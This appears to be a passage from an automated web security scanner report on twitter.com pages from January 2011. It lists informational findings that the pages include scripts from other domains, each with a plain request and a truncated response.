GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.465. http://twitter.com/7News/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/7News/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475
http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475
http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475
http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475
http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475
http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475
http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /7News/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910395-49850-63408
ETag: "85cdef8719ba6d07512d0d99ffbc30f1"
Last-Modified: Mon, 24 Jan 2011 23:06:35 GMT
X-Runtime: 0.00972
Content-Type: text/html; charset=utf-8
Content-Length: 54324
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910394925908; path=/; expires=Mon, 31-Jan-11 23:06:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591039585816877; path=/; expires=Wed, 23 Feb 2011 23:06:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTViNzE3ZDJlNTczNWZjYjFiMDVhOWI5NmFjYTJjOWM2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI1F9Hui0B--57a878bd8dcd4b502ec0bff069b12b796c637c54; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/twitter.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295654475" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295654475" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/geov1.js?1295654475" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/api.js?1295654475" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295654475" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/dismissable.js?1295654475" type="text/javascript"></script>
...[SNIP]...

21.466. http://twitter.com/7News/newsteam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/7News/newsteam

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
http://a0.twimg.com/a/1295646587/javascripts/lists.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /7News/newsteam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-62168-50610
ETag: "da817aed8ad2f932b9830e8a84480989"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.57960
Content-Type: text/html; charset=utf-8
Content-Length: 57201
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lists.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.467. http://twitter.com/7News/status/29619600551317504 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/7News/status/29619600551317504

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /7News/status/29619600551317504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910353-67452-11698
ETag: "df882b3b65e14ceab1da2b4db264ec52"
Last-Modified: Mon, 24 Jan 2011 23:05:53 GMT
X-Runtime: 0.05261
Content-Type: text/html; charset=utf-8
Content-Length: 13694
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910352494991; path=/; expires=Mon, 31-Jan-11 23:05:52 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591035323884356; path=/; expires=Wed, 23 Feb 2011 23:05:53 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlMWUxNmY3YWFiZTFkMjk3MjM1NjU1ZjBkMzliNzg5%250AMTM6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL3N0YXR1%250Acy8yOTYxOTYwMDU1MTMxNzUwNDoHaWQiJTgzNTE4ZDU1NGI3NjIwMzE0Y2Ex%250AMWIzZGQ1MThmZjFlIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIWLlGui0B--925e1e31fa9a3e0528e8a01d8e0ecb1f6fcb625d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.468. http://twitter.com/7news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/7news

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420
http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-40880-22216
ETag: "edad7aa55a25b6aec0246521dae3ab7a"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.01998
Content-Type: text/html; charset=utf-8
Content-Length: 53571
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.469. http://twitter.com/LizPW/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/LizPW/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420
http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420
http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420
http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /LizPW/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910621-77895-31155
ETag: "c259f1b8d242bd50582934993f0c6970"
Last-Modified: Mon, 24 Jan 2011 23:10:21 GMT
X-Runtime: 0.01511
Content-Type: text/html; charset=utf-8
Content-Length: 51420
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910621396653; path=/; expires=Mon, 31-Jan-11 23:10:21 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591062196529909; path=/; expires=Wed, 23 Feb 2011 23:10:21 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWRlMWQ2NzdlN2Y2ZTU0NGM4ZWEyNTMyMWY1ZTk3YzU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsID9NKui0B--e7abc610de60e62983759c4d12e8f2cf3eede5ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/twitter.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295653420" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295653420" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/geov1.js?1295653420" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/api.js?1295653420" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295653420" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/dismissable.js?1295653420" type="text/javascript"></script>
...[SNIP]...

21.470. http://twitter.com/LizPW/status/29620929206165504 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/LizPW/status/29620929206165504

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448
http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448
http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448
http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448
http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448
http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /LizPW/status/29620929206165504 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910609-55052-61887
ETag: "f0d14c8ffca948984521cadb8828dc45"
Last-Modified: Mon, 24 Jan 2011 23:10:09 GMT
X-Runtime: 0.10628
Content-Type: text/html; charset=utf-8
Content-Length: 13847
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910608056839; path=/; expires=Mon, 31-Jan-11 23:10:08 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591060947951191; path=/; expires=Wed, 23 Feb 2011 23:10:09 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlZjIzZWFjODQ4ZTMwNGMwZmI1ZjZiYzg5NTZmMmY3%250AOTQ6DnJldHVybl90byI2aHR0cDovL3R3aXR0ZXIuY29tL0xpelBXL3N0YXR1%250Acy8yOTYyMDkyOTIwNjE2NTUwNDoHaWQiJTIzYjk5NTM3NmZiMjNlNTBiYWYw%250AZmUyZTUyM2MyNjFiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISqJKui0B--b7721b8e7b4f79835b43a20e0bb17f7502fe2043; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448" type="text/javascript"></script>
...[SNIP]...

21.471. http://twitter.com/cw56 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/cw56

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448
http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448
http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448
http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448
http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448
http://a2.twimg.com/a/1295646587/javascripts/dismissable.js?1295901448
http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910406-20060-45194
ETag: "ff97e4d20929a3ffbfd77d3c60c548db"
Last-Modified: Mon, 24 Jan 2011 23:06:46 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 55430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/twitter.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/jquery.tipsy.min.js?1295901448" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/lib/gears_init.js?1295901448" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/geov1.js?1295901448" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295646587/javascripts/api.js?1295901448" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1295646587/javascripts/lib/mustache.js?1295901448" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295646587/javascripts/dismissable.js?1295901448" type="text/javascript"></script>
...[SNIP]...

21.472. http://twitter.com/datasift previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/datasift

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292
http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292
http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292
http://a3.twimg.com/a/1295903943/javascripts/dismissable.js?1295915292
http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964110-52502-21616
ETag: "98dfab6f65418ae81b99a43c3a15ba6b"
Last-Modified: Tue, 25 Jan 2011 14:01:50 GMT
X-Runtime: 0.41713
Content-Type: text/html; charset=utf-8
Content-Length: 46413
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1295903943/javascripts/twitter.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/jquery.tipsy.min.js?1295915292" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/gears_init.js?1295915292" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1295903943/javascripts/lib/mustache.js?1295915292" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1295903943/javascripts/geov1.js?1295915292" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1295903943/javascripts/api.js?1295915292" type="text/javascript"></script>
...[SNIP]...
</script>
